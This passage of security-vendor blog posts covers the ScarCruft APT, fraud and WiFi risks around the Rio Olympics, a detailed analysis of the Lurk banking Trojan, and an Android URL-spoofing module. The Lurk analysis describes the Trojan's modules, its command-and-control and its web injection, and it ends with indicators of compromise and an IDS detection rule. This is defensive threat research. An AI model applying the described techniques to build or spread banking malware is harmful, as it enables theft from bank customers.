utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer. Currently, the group is engaged in two major operations: Operation Daybreak and Operation Erebus. The first of them, Operation Daybreak, appears to have been launched by ScarCruft in March 2016 and employs a previously unknown (0-day) Adobe Flash Player exploit, focusing on high profile victims. The other one, “Operation Erebus” employs an older exploit, for CVE-2016-4117 and leverages watering holes. It is also possible that the group deployed another zero day exploit, CVE-2016-0147, which was patched in April. We will publish more details about the attack once Adobe patches the vulnerability, which should be on June 16. Until then, we confirm that Microsoft EMET is effective at mitigating the attacks. Additionally, our products detect and block the exploit, as well as the malware used by the ScarCruft APT threat actor. * More information about the ScarCruft APT and Operation Daybreak is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com ### IT threats during the 2016 Olympic Games in Brazil Mon, 06/13/2016 - 07:47 Olympic threats designed to trick you Are you planning to visit Brazil during the Olympic Games? Or watch it online? In this blog post we discuss the threats to visitors aiming to travel to Brazil to watch the games and to those planning to watch it online. In the first part we’ll talk about phishing attacks, including one against the organizers of the Games; in the second we highlight WiFi security and the results of the wardriving we did on the streets of Rio, visiting the same places as tourists and the athletes. In the third and final part we touch upon physical security that involves the usage of USB charging spots at airports, the problem of credit card cloning and ATM skimmers that will directly affect visitors to this summer’s Olympic Games in Rio. It is clear that using the Olympic Games theme is very attractive to the bad guys. Cybercriminals always use popular sports events as bait for their attacks, as they did it in the 2014 World Cup – an event we monitored very closely due to the impressive amount of attacks registered at the time, mainly in Brazil. But the forthcoming Olympic Games has been a bit different. The number of attacks has been low, compared with the World Cup. There are many reasons to explain it one of which is that the International Olympic Committee (IOC) keeps a very active Security Operations Center (SOC), working and treating the security incidents, reporting phishing and malware campaigns. As a result, the number of “in-the-wild” attacks targeting users at this time are low. However, the bad guys have no limit when it comes to creating new attacks. We were able to track and block several of them, such as the registration of malicious domains, fake giveaways promoted on social networks and, of course, websites selling fake tickets, using all possible ways to trick users. The rise of bad domains Most of the attacks start with the registration of a domain that clearly shows its malicious intent. Since the beginning of the year, we monitored the creation of new domains registered with the name of the city that will held the games. In fact, we found that the bad guys are constantly registering new creations at the start of every attack. Our blacklist contains more than 230 of these bad domains. Several of these domains were registered via a free webmail account or use domains as protection to hide the real identity of the owner. Some of these domains are hibernating, waiting for the right moment to start an attack (especially those promising free streaming). Others were used to host fake ecommerce sites selling tickets, hosting phishing, malware, or even used to spread fake ticket giveaways. Another interesting point is that several of these domains are already using the new gTLD approved by ICANN (such as .tech and others). The phishing phenomenon It’s not only end-users who are targets of phishing attacks. Brazil tops the list as the most attacked country with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. In February we identified a very interesting targeted campaign, on our domain monitoring system, against the IOC using the malicious domain masquerade as their Intranet portal. The purpose of the attackers was to steal credentials of IOC employees working in Brazil. The fake site looked like this when it was live and we are also aware of several other attacks including this one: IOC employees were the target of phishing campaigns to steal credentials The most common attacks are those that aim to phish the final user – stealing credentials is a very easy attack that even a non-skilled criminal can do. We saw phishing scams with different goals, in several colors and guises. This one was very popular in Brazil and aims to clone your credit card using the name of a Brazilian company and promising to giveaway a new car and tickets to the Games: Free tickets and car giveaway. All fake promises. Fake tickets, fake giveaways, real losses As happened during the last World Cup, most of the malicious e-mails sent by the Brazilian bad guys used free tickets to watch the Games in Rio as the bait. Some of these messages also pointed to fake websites. This is a good example of a very well done campaign, promising the direct sales of tickets without applications to the official lotteries, that take place for people living in Brazil: Why bother to participate in the official lottery when you can buy a ticket direct from a fraudster? Other fake websites also offered tickets with a very low price, to attract people looking to buy tickets at the last hour. This website, targeting Brazilians, looks good but on closer inspection it is written in poor Portuguese: The purpose here was to sell fake tickets with the victim paying but receiving nothing. The payment method selected by the fraudster was Brazilian boletos, a very popular payment system, used mostly for people that don’t have credit cards. The bait to attract the attention was very low prices. The ticket to the inaugural ceremony cost U$500.00 and a match of the Brazilian National Football Team cost only U$50.00. Of course everything was fake: “Watch the Male Football match paying only U$ 50,00”

Bad guys also used social media to spread their attacks. Facebook was the most used network in these cases, such as this fraudulent page announcing a fake ticket giveaway. The page is still online:

If you want to watch the games, it’s too late to buy tickets via the official channels. We do not recommend buying through unofficial markets as there is a high possibility that you are buying a pig in a poke. To make sure you don’t get caught out, the best thing is to watch the games on TV or online – but be aware of malicious streaming websites, as they will undoubtedly appear in a last ditch attempt by the bad guys to try and infect your computer and steal your data.

WiFi security

When we travel, we usually access the Internet more to help stay in touch, tweet, post status updates and share pictures. However, international data plans are usually very expensive and this is why we look for WiFi hotspots. Cybercriminals know this and every year set up fake access points or compromise legitimate WiFi networks to intercept and manipulate their victim’s browsing. Their focus for the attack is user’s passwords, credit cards and other sensitive personal information. Open and misconfigured WiFi networks are actually preferred vehicles for criminals.

To identify the extent of the problem in Brazil, we drove by three major areas of the Olympic games and passively monitored the available networks which visitors are most likely to try and use during their stay – the Brazilian Olympic Committee building, Olympic Park and the stadiums (Maracanã, Maracanãzinho and Engenhão).

Beautiful beaches, bossa nova and insecure WiFi

Running a fast recognition over two days and on the map marked with a star sign, we were able to find about 4,500 unique access points located in the aforementioned areas.

Most of the networks actually work on the 802.11n standard:

That means that most of the hardware used to build the WiFi access points is new and works especially well for multimedia streaming, reaching speeds of up to 600Mbps and working not just on 2.4Ghz and 2.5Ghz but also 5Ghz.

However, when it comes to their security, 18% of all available WiFi networks in the area are insecure and openly configured. That means that all data sent and received in such networks is not protected by any encryption access key.

We can see that additionally 7% of all networks are WPA-personal protected. That algorithm is actually obsolete today and can be broken with minimal effort. In our opinion this is especially concerning as users who connect to their “trusted” networks may believe that they are actually connecting to a secure network, when in reality it could be compromised by an attacker, who could deliver different kind of attacks to manipulate network traffic with user’s data.

So, about a quarter of all WiFi networks in the areas of the Olympic games are insecure or configured with weak encryption protocols. This means that the attackers can break them first and then develop technical circumstances to sniff victim’s navigation data and steal their sensitive data.

Is it possible to use an open WiFi network and still have a secure Internet connection? The answer is yes, however only when using a VPN connection.

We strongly recommend, regardless of any WiFi network you use while travelling, to use a VPN connection, so the data from your end-point travels to the Internet through an encrypted data channel. This way even if you work from a compromised WiFi network, the attacker might not get access to your data.

However not all VPN providers actually offer the same good service. Some of them are vulnerable to DNS leak attacks. That means that even if your immediate sensitive data is sent via VPN, your DNS queries or requests are sent in plain text to the DNS servers set by the access point hardware. In this scenario the attacker can still at least know what servers you are browsing and then, if it has access to the access point of the compromised WiFi network, can define malicious DNS servers. That would essentially mean, next time you type the name of your bank in the browser, the IP address where it goes to will be a malicious one. So, even some experienced users may become an easy victim for the attackers. There is almost no limit from the attackers’ point of view when they have control of your DNS servers.

So, before you use your VPN connection, make sure it does not have a DNS leak problem. If your VPN provider doesn’t support its own DNS servers, you might consider another VPN provider or a DNSCrypt service, so your DNS requests will make external and encrypted queries to secure DNS servers. Remember that what starts as a small security issue could have big security implications.

A simple formula must be this: any network you connect to, use your VPN connection with its own DNS servers. Don’t rely on any local settings since you can’t be sure if the WiFi access point you connect to is compromised or not.

Physical security

Another point that requires vigilance when travelling is physical security – not everything that is useful is exactly what it seems. Criminals often use tactics to deliver malicious attacks on situations where you do not necessarily think there is a risk. Let’s look at some common situations where this could happen.

USB charging spot

As mentioned before, using a mobile phone when traveling is crucial and it can be a big challenge to keep it sufficiently charged all day long. In order to help tourists, most cities are investing in charging points that can be easily found in shopping malls, airport and taxis. Most of them provide connectors for the majority of phone models as well as a USB connector that can be used with your own cable.

Charging spot provided in a Brazilian cab

Some models usually found in shopping malls and airports also provide a traditional power supply that can be used with your own charger.

Charging spot at Rio International Airport. Which one do you think is the most secure?

While connected via USB, the attacker can execute commands in order get information about the device including the model, IMEI, phone number and battery status. With that information it is possible to run an attack for the specific phone model and then successfully infect the device and collect personal information.

This doesn’t mean that we should never charge our devices when away from home, but by following these simple rules you can protect yourself from this kind of attack:

• Always use your own charger and avoid buying one from unknown sources;
• Use the power outlet instead of USB socket when using an unknown charging point;
• Don’t use the charging cables at a public charging spot.
ATM skimmer

The ATM skimmer attack, also known as “Chupa-cabra” in Brazil and other countries in Latin America, is a very popular type of attack that is still being used by criminals in Brazil. From time to time a new gang appears on the news delivering this attack somewhere across the country, mainly in places commonly frequented by tourists, such as the Rio International Airport. In 2014 a gang installed 14 ATM skimmers there.

There are different types of ATM skimmers in Brazil, the most common just installs a reader for the card and a camera in order to record the password as it is typed.

An ATM skimmer which installs a camera to record the typed password

For this type of skimmer you can protect yourself by hiding the keypad while typing the password which will avoid your password from being recorded by the installed camera.

Unfortunately, this method will not help in all cases, as there is another type of skimmer where criminals replace the entire ATM, including the keypad and screen. In this case, the typed password will be stored on the fake ATM system.

ATM Skimmer which replaces the entire ATM

In order to avoid this type of attack it is important to be aware of any suspicious behavior while using the ATM.

• Check if the green light on the card reader is on. Usually they replace the reader with a version where there is no light or it is off.
• Before starting the transaction, check if there is anything suspicious on the ATM such as missing or badly fixed parts;
Credit Card Cloning

Unfortunately, Brazil is well known for its credit card cloning activities and it is not hard to find someone who had their card cloned while visiting the country.

Credit and debit cards are widely used in Brazil and almost everywhere accepts cards as payment methods – including street vendors. Actually most of them prefer credit card payments in order to avoid problems with the change.

Brazilian banks are referenced across the world regarding their fight against credit card cloning as well as their pioneer status in adopting chip-based cards to protect customers from this type of attack by making it much harder to clone the card. However, it was only a matter of time before Brazilian criminals would find a way to start cloning the chip-based cards, by exploiting flaws in the EMV transaction implementation.

We could see Brazilian criminals exchanging information about how to execute an attack on a chip-based card in order to extract the information and then write it back to another card using some tools.

Tool used to save the information to the smart card

It is really hard to protect yourself against this type of attack, because usually the point-of-sale is modified in order to save the information, to be collected later by the criminals. Sometimes they don’t need physical access to extract the stolen information as it is collected via bluetooth.

One good solution from the banks is SMS notifications for each transaction made using your card. Even though it does not avoid card cloning, the victim will be notified about the fraudulent transaction as soon as it happens then it can contact the bank in order to block future transactions.

To reduce the chances of having your card cloned, there are some simple steps to take:

• Never give your card to the retailer. If for some reason they cannot bring the machine to you, you must go to the machine;
• If the machine looks suspicious, change the payment method. It is always good to have some money with you as a back-up;
• Before typing your PIN make sure you are on the correct payment screen and that your PIN is not going to be shown on the screen.

For everybody visiting Brazil to watch the games, we wish you safe flights and a safe stay. To our readers we wish you safe online surfing and for the Olympic athletes, may the best one win!

### Lurk Banker Trojan: Exclusively for Russia

Fri, 06/10/2016 - 07:32

One piece of advice that often appears in closed message boards used by Russian cybercriminals is “Don’t work with RU”. This is a kind of instruction given by more experienced Russian criminals to the younger generation. It can be interpreted as: “don’t steal money from people in Russia, don’t infect their machines, don’t use compatriots to launder money.”

“Working with RU” is not a great idea where cybercriminals’ safety is concerned: people from other countries are unlikely to report an incident to the Russian police. In addition, online banking is not very popular in the RU zone – at least, it is much less popular than in the West. This means that the potential income from operating in the RU zone is lower than in other zones, while the risk is higher. Hence the rule “Don’t work with RU”.

As always, there are exceptions to the rule. A rather prominent banker Trojan – Lurk – that is the subject of this paper has been used to steal money from Russian residents for several years.

We have written about this banker Trojan before. It caught our attention almost as soon as it appeared because it used a fileless spreading mechanism – malicious code was not saved on the hard drive and ran in memory only. However, until now no detailed description of Lurk had been published.

What Makes the Trojan Different

The Lurk banker Trojan is in a league of its own when it comes to malware designed to steal money from bank customers:

• Lurk has existed and actively evolved for over five years, but it works selectively – only on those computers where it can steal money. In the more than five years that it has been active, about 60,000 bots have been registered in the C&C, which is not a huge number.
• Lurk is a versatile banker Trojan – it can steal money not only from the iBank 2 system that is used by many Russian banks but also from the unique online banking systems of some large Russian banks.
• Lurk actively resists detection: its developers work hard to minimize detections of their Trojan, while targeted attacks make it difficult to get new samples quickly.
• Based on the methods of internal organization used in the malware, its feature set and the frequency with which it is modified, it can be concluded that a team of professional developers and testers is working on the project.

This is not to say that the Trojan is particularly well written: we have seen and analyzed banker Trojans with much higher code quality. Moreover, our analysis of Lurk has shown that several programmers with different levels of qualification have worked on the code. The developers clearly made some bad choices in places, which have remained unfixed for years (needless to say, we are not going to alert the developers to their mistakes). It is worth noting that the malware writers are developing their product: we see that the quality of code has improved over time and the solutions chosen by the developers have generally improved. What sets Lurk apart is that it is highly targeted – the authors do their best to ensure that as many victims of interest to them as possible get infected without catching the attention of analysts or researchers. The incidents known to us make us believe that Lurk is successful at what it was designed for: we regularly receive reports of thefts from online banking systems and forensic investigations after the incidents reveal traces of Lurk on the affected machines.

Victims

The cybercriminals are interested in the following types of organizations:

• IT organizations working in telecommunications field;
• mass media and news aggregators;
• banks and financial organizations.

Compromised computers of IT and telecoms companies provide the cybercriminals behind Lurk with new transfer servers through which traffic goes to the attackers’ servers. Media and news aggregator sites, particularly those visited by accountants, are used to infect a large number of users from Lurk’s ‘target audience’. Banks and financial organizations are of interest to the cybercriminals in connection with their main goal – stealing money.

We won’t comment on the reasons behind the malware authors’ attempts to get a foothold on the machines inside security agencies (these organizations are also among those targeted by Lurk).

The Trojan’s targets appear to include Russia’s four largest banks.

Distribution

The well-known technique of drive-by downloads is used to distribute the Lurk banker Trojan. In addition, the cybercriminals distribute the Trojan via compromised websites with legitimate software and across corporate networks – using the psexec utility.

Infecting Using an Exploit Pack

Lurk is distributed primarily using the infamous Angler exploit pack (cybercriminals call it XXX). With this method of distribution, users don’t have to do anything in particular for their computers to become infected.

Angler is rightfully considered the flagship of exploit packs: exploits for new vulnerabilities are nearly always first implemented in Angler and only later make their way into other exploit packs (or perhaps are just borrowed’). Exploits for zero-day vulnerabilities are also often implemented in Angler, making the exploit pack particularly dangerous.

Preparation for infecting new victims with Lurk is usually performed as follows:

1. A website that is of interest to the target audience is selected. This can be a message board for accountants, a news portal, etc.

The website is infected by stealthily placing a link on it that leads to the exploit pack’s landing page. If it proves impossible to infect the site, a malicious link is placed into the materials of some ‘affiliate program’ that are shown on the site.

2. Users visiting the site are redirected to the exploit pack’s landing page without their knowledge. Angler attempts to exploit some vulnerability in the software installed on the user’s computer, which should result in the execution of Lurk’s downloader – mini.

Curiously, the link to the exploit pack’s landing page is either placed for a short time or is regularly placed and removed. For example, we have seen the message board of a well-known magazine for accountants become infected. A malicious link appeared on the message board on weekdays for exactly two hours at lunchtime. Of course, we detected the anomalous activity and notified the owners of the resource. However, by the time they read our letter the resource was clean again and they could not identify the infection. At the same time, during the period when the malicious link was shown on the message board, the Lurk owners managed to infect several new user machines.

Infecting via Compromised Websites

The second method of infection that the cybercriminals used extensively is the distribution of malicious code via legitimate websites. Apparently, this distribution method involves providing infected files to users in the RU zone only, while other users get clean files.

Infecting Machines across a Corporate Network

The scheme whereby one computer in an organization is initially infected is very popular among cybercriminals. Even if the infected machine itself is of no interest to the attackers, the computer is on the same network and on the same domain with other computers containing information that the Trojan’s owners want. In such cases, the psexec utility developed by Mark Russinovich is used to distribute the malware across the network. A special mini dropper is then used to execute the Trojan’s main module on other computers on the same network. This method can result in dire consequences for the organization, since the security of a computer containing data of interest to the cybercriminals essentially depends on that of the least protected computer on the network that is under attack.

Main Modules

The Trojan consists of several modules that have reasonably rich capabilities. The main Lurk modules are:

• mini module;
• prescanner module;
• core module (the bot’s kernel),
• core_x64 module (64 bit version of the kernel);
• mini_x64 module (64 bit version of the mini module).
The mini Module

In the first stage of an attack involving the Angler exploit pack, a vulnerability found in the user’s software is exploited and the mini module of Lurk banker Trojan is downloaded and executed. As mentioned above, the user can download the malicious file from a compromised website; another possibility is infection over the local network.

By Lurk standards, mini is a small program (100-400 KB). Its main function is to download and execute two other main Lurk modules. The address of the server used by mini is hardcoded in the program’s body. Modules are downloaded using standard GET requests. The modules downloaded by mini are encrypted, with different encryption algorithms used. The prescanner module is encrypted using the simple “xor-next” algorithm. Other modules are encrypted using the BlowFish algorithm (ECB Mode), the pseudo key for which is hardcoded into mini. The real key is created from the hardcoded pseudo key using a sequential search for one character (a brute force attack).

To avoid having to download additional modules every time mini is executed, the Trojan saves these modules in a separate encrypted file located in %APPDATA% folder. The contents of the storage is encrypted with the Blowfish algorithm, using a key that depends on the time the Windows folder was created. In addition to a plugin’s name and body, the storage file includes a list of checksums of the names of those processes in whose context the plugin is to be executed. This information is used by mini to determine which process a plugin should be injected into: for web injection modules, this is a browser process; for the ibank module, it is Java.exe, in whose context the online banking system operates.

The prescanner module

According to the operating logic of mini, the second stage of the attack is to load the prescanner module. The module is a dynamically loaded library with only one exported function – Prescan.

The cybercriminals need prescanner to make their attacks as narrowly targeted as possible. If a machine does not match the specific rules of prescanner and no online banking systems have been found on it, the module reports this to mini and the latter decides not to try to achieve persistence on the machine. In this way, the Trojan’s developers try to avoid attracting the attention of law enforcement agencies and anti-malware product developers. The following fact supports this idea: every time a new bot is registered by the C&C, a unique identifier – bot number – is assigned to the bot. In the more than five years that the banker Trojan has existed, only about 60,000 bots have been registered by the C&C.

• collecting information about an infected system;
• grabbing passwords from FTP clients found on the user’s machine.

After collecting information about the machine and checking whether its rules are observed, prescanner sends a report to its command server. In the cases that we have seen, the C&C used by prescanner was the same as that used by the mini downloader.

If it is decided that a machine is unsuitable for a Lurk attack based on the analysis performed, mini and prescanner modules terminate and uninstall themselves. If prescanner has made the decision to ensure persistence on the machine, it reports this to the mini downloader, which in turn downloads and executes the core module – the bot’s main body.

The core module

Core is the main module of Lurk. Its main functions are:

• network interaction with the C&C;
• executing commands received from the cybercriminals;
• logging keypresses (keylogger function) and recording video from the infected system’s screen;
• maintaining the encrypted data storage and Lurk settings;

The core module is a communication channel of sorts between all the other malware modules and the command server. The C&C servers used for mini and for core are different. Core does not have a hardcoded command server address. The address of its command server is calculated using DGA – the Domain Generation Algorithm. Among other DGA input parameters, the Trojan’s authors use exchange quotation data received from Yahoo Finance. This means that the data used to generate C&C addresses cannot be known to security experts in advance. As a result, it is impossible to predict the addresses generated by Lurk.

After successfully establishing a connection, data collected by the malware and the results of executing commands are sent to the command server every five minutes, with requests for new updates and commands. All communication between the core module and the C&C is encrypted – core and C&C exchange data is in the JSON format.

The function of intercepting data entered on the keyboard is implemented in the core module in the newer versions of Lurk (starting at least from 8.9773). Keypresses are intercepted only in the context of windows that have specific words/phrases in their names. The list of these words/phrases is received from the C&C. Intercepted data is sent to the command server during the next communication session (every 5 minutes).

The main part of Lurk’s storage is located in the system registry, but some additional data belonging to the storage can be saved as a file on the hard drive. As a rule, files are used to store a large but logically uniform volume of data, such as video captured from the screen or code for web injection. But in any case, links to these additional files are always present in the main part of the storage, which is located in system registry.

The bot’s additional modules (plugins) are downloaded by the core module to those computers the malicious program deems most suitable. Those modules that are required on a specific computer to steal money are downloaded to that computer.

The Lurk modules currently known to us are listed in the table below.

Plugin GUID Name Plugin function {5FBA6505-4075-485b-AEC4-75767D9054C9} module_Bifit A set of .class-files designed to introduce changes into the normal operation of iBank 2 systems, in order to steal money. {0F3E7AFA-1F2B-4b0e-99D6-3716A4C3D6DE} module_Bifit_admin An administrative applet for iBank 2 systems modified by cybercriminals, designed to steal credentials and key files from iBank 2 systems. {04DB063E-1454-4a73-B2CC-4DB6D4BB6AA1} module_ibank This plugin is used to inject malicious applets into the iBank 2 system. These applets (along with other tools) are used to steal money from the user. {AABA3126-14E2-443b-A11B-FB6C1F793103} module_w3bank This plugin is designed to organize web injections into the pages of remote banking systems. {5C345F77-B111-4a85-B6D6-EC8F27F993C4} module_w3bank_scripts A set of scripts written in JavaScript for injection by the module w3bank; designed to steal money and data from remote banking systems. {50D13F6C-FC46-4fdf-A294-E149D36E54D4} module_spider An auxiliary module whose main task is to ensure other Lurk modules are loaded into the contexts of the processes iexplore.exe, firefox.exe, chrome.exe, opera.exe, jp2launcher.exe, java.exe before these processes are actually launched. {52F1F7D8-4BCC-4498-AC86-3562F81990F6} module_vnc This plugin provides remote access via VNC to the infected computer (for remote control over the infected computer). {A06B5020-0DF3-11E5-BE38-AE5E4B860EDE} rdp-plugin-x86 This plugin ensures that RDP is enabled on the infected computer.

{9F786E98-3D4C-4020-8819-B97D9D4DBCC0} highLauncher Bot plugin loader at a high Integrity level (required for rdp-plugin-x86 and lsa-plugin-x86). {968A2A9A-7DF4-4E69-BF81-563AF8FFB7DC} launcher The loader of mini. It awaits an IPC message with the name <LurkDll>, after which it loads mini with the help of LoadLibrary(). It is used in the mini launch process while escalating privileges. {5B3957F2-AAAF-4FF8-94B8-83C52AFCD2A9} lsa-plugin-x86 The plugin for grabbing administrator and/or domain accounts (the well-known program mimikatz is used).

We will now look at three bot modules (plugins) in more detail – they are the modules w3bank and ibank.dll – the two workhorses of the Lurk Trojan that are directly involved in stealing money – and the module_vnc module that makes it possible to remotely control the infected system using the VNC protocol.

The w3bank module

The w3bank module is designed for attacks on remote banking systems. Its main task is to perform injections into the user’s browser.

The ibank module

The ibank module is designed to steal money in iBank remote banking systems.

This module runs in the context of a Java virtual machine. When a Java applet is started, it is checked to see whether it belongs to the iBank 2 system. If this remote banking system is launched, a request is sent to the C&C asking if the applet should be blocked or allowed to run. If an “allow to run” command arrives in response, a set of Java-class files is sent to replace the original classes of the iBank applet.

The infected applet enables the cybercriminals to stealthily replace the data in payment orders, leaving the original information in the printouts.

The module_vnc module

The module_vnc module provides the ability to remotely control an infected system using the VNC protocol. When this happens, the remote node gains full access to the system: it can see the image displayed on the screen, send and receive any files or data, including data from video/audio input devices, use the software installed on the machine and install new software.

This module also makes it possible to launch browser processes with the following parameters:

Mozilla Firefox: -profile
Internet Explorer: -nomerge

Each time Mozilla Firefox and Google Chrome are launched a new browser user profile is created. This helps hide the Trojan’s activities from the legitimate user, who will not be able to see any trace in the history of visited sites. This also helps create a separate session on a website, parallel to an already open session. In particular, this makes it possible to log in a second time to the site the legitimate user is working with, and perform actions in a parallel session that will not affect the user’s session.

Stages of a Lurk attack

As a result, the Trojan’s typical attack sequence is as follows:

1. The user’s computer is infected by exploiting a vulnerability;
2. The mini module is launched on the infected computer;
4. prescanner steals the user’s FTP credentials;
5. If an analysis finds that the infected computer is unsuitable, mini and prescanner silently terminate themselves.
6. If the infected computer is of interest to the cybercriminals, the attack continues.
7. If the attack continues, mini downloads and launches the core module, the bot’s main body.
8. core connects to the bot’s C&C server, receives commands from the cybercriminals and executes them.
10. core spies on the user: intercepts data entered from the keyboard, and captures the video stream from the screen of the infected system. Capturing is only performed for windows with specific keywords/phrases in their names. A list of keywords is received from the C&C and is primarily determined by the financial interests of Lurk’s owners.
11. Using additional modules (ibank, w3bank), Lurk steals money from remote banking systems.
Example of an Attack on a Bank

During our research, we detected a Lurk attack on a major Russian bank that was using the w3bank module to perform web injections. We were able to obtain the scripts of the injections.

The files of the infection scripts have identical names for different remote online banking systems (content.min.js), but a different GUID, as the latter is generated in a random fashion.

This script intercepts the authentication information entered into the remote banking system. When the user logs in to the remote banking system, their username and password are intercepted. After successful authentication, a parallel session is created that is hidden from the user and in which Lurk scans the banking pages and searches for the card holder’s name and the phone number linked to the card. The malicious script collects all the information required to make a payment in that online banking system. This information is then sent to the C&C server whose address is identical to the network address of the server communicating with the core module.

In response, the C&C server may send a script to be executed in the browser context. We were unable to obtain such a script for this research.

The C&C server may also register an automated payment that will be executed the next time the user logs in to the online banking system.

Conclusion

The Trojan’s creators have made an effort to protect their creation from researchers, and especially to protect Lurk from an in-depth analysis, or, at the very least, greatly hinder such analysis. However, despite all the difficulties of analyzing the Trojan, Lurk is quickly detected by modern anti-malware solutions.

It’s not only anti-malware companies that are countering Lurk; the manufacturer of the iBank 2 system, BIFIT, is also taking measures to combat the attacks launched against its product. The company has implemented methods to counteract banking Trojans in its iBank 2 software and investigated their effectiveness. The BIFIT research shows that of all the protection tools implemented in iBank 2, only control over the bank’s server is effective against Lurk; all the other measures implemented in iBank 2 were successfully bypassed by the Lurk creators, testifying to their professionalism.

Lurk gives the impression of being a complex, powerful system designed to achieve its creators’ criminal goals, i.e., stealing money from users. The perseverance and focus with which they work with their Trojan suggest they are highly motivated.

Kaspersky Lab counteracts this Trojan using signature-based, heuristic and proactive detection methods. With this approach, we can even detect new specimens of Lurk before they are added to our collection. Kaspersky Lab’s products detect this Trojan with the following verdicts: Trojan.Win32.Lurk, Trojan-Banker.Win32.Lurk, Trojan-Spy.Win32.Lurk.

In conclusion, we give the following recommendations that may be hackneyed but are nonetheless relevant. The security of an online banking system is ensured by:

• Competent design and administration of an organization’s local area networks;
• Regular training on information security rules and norms for employees;
• Use of modern security software that is regularly updated.

We are confident that observing these simple rules will help ensure a high level of protection from Lurk and similar threats.

IOCS: Registry keys:

Files: Possible names of the mini module:

%APPDATA%\API32.DLL
%APPDATA%\dlg.dll
%APPDATA%\mm.dll
%APPDATA%\setup.dll
%APPDATA%\help.dll
%APPDATA%\mi.dll
%APPDATA%\http.dll
%APPDATA%\wapi.dll
%APPDATA%\ER32.DLL
%APPDATA%\core.dll
%APPDATA%\theme.dll
%APPDATA%\vw.dll
%APPDATA%\el32.dll
%APPDATA%\sta.dll
%APPDATA%\p10.dll
%APPDATA%\fc.dll
%APPDATA%\in_32.dll
%APPDATA%\pool.drv
%APPDATA%\env.dll
%APPDATA%\man.dll

Possible names of the storage module:

%APPDATA%\ddd2.dat
%APPDATA%\pdk2.dat
%APPDATA%\km48.dat
%APPDATA%\9llq.dat
%APPDATA%\ddqq.dat
%APPDATA%\834r.dat
%APPDATA%\gi4q.dat
%APPDATA%\wu3w.dat
%APPDATA%\qq34.dat
%APPDATA%\dqd6.dat
%APPDATA%\w4ff.dat
%APPDATA%\ok4l.dat
%APPDATA%\kfii.dat
%APPDATA%\ie31.dat
%APPDATA%\4433.dat

Network indicators: C&C servers:

3d4vzfh68[.]com
43xkchcoljx[.]com
carlton69f[.]com
diameter40i[.]com
elijah69valery[.]com
embassy96k[.]com
evince76lambert[.]com
globe79stanhope[.]com
groom58queasy[.]com
hackle14strand[.]com
hotbed89internal[.]com
mechanic17a[.]com
paper17cried[.]com
plaguey42u[.]com
possum89hilarity[.]com
rhythmic81o[.]com
ri493hfkzrb[.]com
roomful44e[.]com
s8f40ocjv[.]com
scale57banana[.]com
wing97pyroxene[.]com
yf3zf90kz[.]com

IDS rules:

alert tcp $HOME_NET any ->$EXTERNAL_NET $HTTP_PORTS (msg:”Bot.Lurk.HTTP.C&C”; flow:established,to_server; content:”POST”; pcre:”/\?hl=[a-z]+&source=[^\r\n&]+&q=[^\r\n&]+/msi”;) MD5: mini: 185C8FFA99BA1E9B06D1A5EFFAE7B842 2F3259F58A33176D938CBD9BC342FDDD 217DAB08B62B6F892A7D33E05E7F788C 3387E820F0F67FF00CF0C6D0F5EA2B75 36DB67CCADC59D27CD4ADF5F0944330D 6548D3304E5DA11ED2BED0551C3D6922 72D272A8198F1E5849207BC03024922D 85B66824A7F2787E87079903F0ADEBDF B4FFAD760A52760FBD4CE25D7422A07B C461706E084880A9F0409E3A6B1F1ECD D0B4C0B43F539384BBDC103182E7FF42 E006469EA4B34C757FD1AA38E6BDAA72 E305B5D37B04A2D5D9AA8499BBF88940 E9CAB9097E7F847B388B1C27425D6E9A E9DA19440FCA6F0747BDEE8C7985917F F5022EAE8004458174C10CB80CCE5317 prescanner: A802968403162F6979D72E04597B6D1F core: C15E18AFF4CDC76E99C7CB34D4782DDA 8643E70F8C639C6A9DB527285AA3BDF7 ibank.dll: A6C032B192A8EDEF236B30F13BBFF204 4CB6CA447C130554FF16787A56A1E278 BFE73DE645C4D65D15228BD9A3EBA1B6 CC891B715C4D81143491164BFF23BF27 module_vnc: 601F0691D03CD81D94AD7BE13A10A4DB 6E5ADF6246C5F8A4D5F4F6BBFC5033B9 78EDD93CEA9BEDB90E55DE6D71CEA9C4 w3bank.dll: 1B84E30D4DF8675DC971CCB9BEE7FDF5 3A078D5D595B0F41AD74E1D5A05F7896 ### Everyone sees not what they want to see Mon, 06/06/2016 - 06:57 In early March, Kaspersky Lab detected the modular Trojan Backdoor.AndroidOS.Triada which granted superuser privileges to downloaded Trojans (i.e. the payload), as well as the chance to get embedded into system processes. Soon after that, on March 15, we found one of the modules enabling a dangerous attack – spoofing URLs loaded in the browser. The malicious module consists of several parts and is detected by Kaspersky Lab products as Backdoor.AndroidOS.Triada.p/o/q. When it gains superuser privileges, it uses regular Linux debugging tools to embed its DLL (Triada.q, which then loads Triada.o) into the processes of the following browsers: • com.android.browser (the standard Android browser) • com.qihoo.browser (360 Secure Browser) • com.ijinshan.browser_fast (Cheetah browser) • com.oupeng.browser (Oupeng browser) The DLL intercepts the URL the user is opening, analyzes it and, if necessary, changes it to another URL. The rules for changing the URL are downloaded from the C&C server while the module is running. Attack sequence In an uninfected system, the browser sends a request with a URL address to the web server via the Internet, and receives a page in response. After infection by Triada, a DLL intercepting URLs is added to the browser’s process. The URL address request finds its way into this DLL, where it is modified and sent to another web server. As a result, the browser receives data that’s different from that requested, meaning the user ends up viewing a different page. Now, this sequence of actions is being used by malware creators to change the standard search engine selected in the user’s browser, and to replace the home page. Essentially, these actions are identical to those carried out by numerous adware programs for Windows. However, there is nothing to stop similar attacks intercepting any URL, including banking URLs, and redirecting users to phishing pages, etc. All it takes is for the cybercriminals to send the appropriate command. During our observation period, this module attacked 247 users, and there have been no signs of a decrease in the intensity of attacks. The number of module versions is small; it appears the creators of this backdoor have decided to focus their efforts elsewhere, in spite of all the ‘promise’ shown by this technology. The geography distribution is very similar to that of root-access malware, as this module can only function together with Triada, and is downloaded by Triada. Number of users attacked by Backdoor.AndroidOS.Triada.p in different countries In conclusion, we would like to note that cybercriminals specializing in Android are pretty lazy – it’s easier for them to steal money directly, for instance, with the help of Trojans that send text messages to premium-rate numbers, or spoof banking app windows. However, we have recently observed that some cybercriminals have begun to actively study the structure of the operating system, expand their repertoire of technical skills, and launch sophisticated attacks like the one we examined above. ### Small users in a big network Mon, 05/30/2016 - 06:58 Children use the Internet for schoolwork, socializing, watching films and cartoons, playing games and much more. But, as we all know, browsing the web can be an unsafe business. In order to control their children’s online activity many parents use specialized software – so-called parental control. This software is usually capable of controlling the amount of time a 